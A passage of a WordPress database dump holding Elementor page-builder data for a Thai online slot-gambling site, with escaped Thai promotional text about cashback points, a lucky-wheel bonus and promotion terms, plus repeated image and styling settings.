data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 naijan<\\/strong> \\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\">naijan <strong data-start=\\\"2414\\\" data-end=\\\"2445\\\">\\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(519,27,'_thumbnail_id','347'),(520,16,'_thumbnail_id','354'),(521,85,'_elementor_edit_mode','builder'),(522,85,'_elementor_template_type','wp-page'),(523,85,'_elementor_version','3.32.5'),(524,85,'_elementor_pro_version','3.32.3'),(525,85,'_wp_page_template','default'),(526,85,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(527,85,'_elementor_data','[]'),(528,85,'_thumbnail_id','61'),(529,86,'_elementor_edit_mode','builder'),(530,86,'_elementor_template_type','wp-page'),(531,86,'_elementor_version','3.32.5'),(532,86,'_elementor_pro_version','3.32.3'),(533,86,'_wp_page_template','default'),(534,86,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(535,86,'_elementor_data','[]'),(536,86,'_thumbnail_id','61'),(539,87,'_elementor_edit_mode','builder'),(540,87,'_elementor_template_type','wp-page'),(541,87,'_elementor_version','3.32.5'),(542,87,'_elementor_pro_version','3.32.3'),(543,87,'_wp_page_template','default'),(544,87,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(545,87,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(546,87,'_thumbnail_id','61'),(551,88,'_elementor_edit_mode','builder'),(552,88,'_elementor_template_type','wp-page'),(553,88,'_elementor_version','3.32.5'),(554,88,'_elementor_pro_version','3.32.3'),(555,88,'_wp_page_template','default'),(556,88,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(557,88,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(558,88,'_thumbnail_id','61'),(561,89,'_elementor_edit_mode','builder'),(562,89,'_elementor_template_type','wp-page'),(563,89,'_elementor_version','3.32.5'),(564,89,'_elementor_pro_version','3.32.3'),(565,89,'_wp_page_template','default'),(566,89,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(567,89,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(568,89,'_thumbnail_id','61'),(571,90,'_elementor_edit_mode','builder'),(572,90,'_elementor_template_type','wp-page'),(573,90,'_elementor_version','3.32.5'),(574,90,'_elementor_pro_version','3.32.3'),(575,90,'_wp_page_template','default'),(576,90,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(577,90,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_motion_fx_mouse\":\"yes\",\"_animation\":\"bounce\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(578,90,'_thumbnail_id','61'),(584,91,'_elementor_edit_mode','builder'),(585,91,'_elementor_template_type','wp-page'),(586,91,'_elementor_version','3.32.5'),(587,91,'_elementor_pro_version','3.32.3'),(588,91,'_wp_page_template','default'),(589,91,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(590,91,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_motion_fx_mouse\":\"yes\",\"_animation\":\"bounce\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(591,91,'_thumbnail_id','61'),(595,92,'_elementor_edit_mode','builder'),(596,92,'_elementor_template_type','wp-page'),(597,92,'_elementor_version','3.32.5'),(598,92,'_elementor_pro_version','3.32.3'),(599,92,'_wp_page_template','default'),(600,92,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(601,92,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 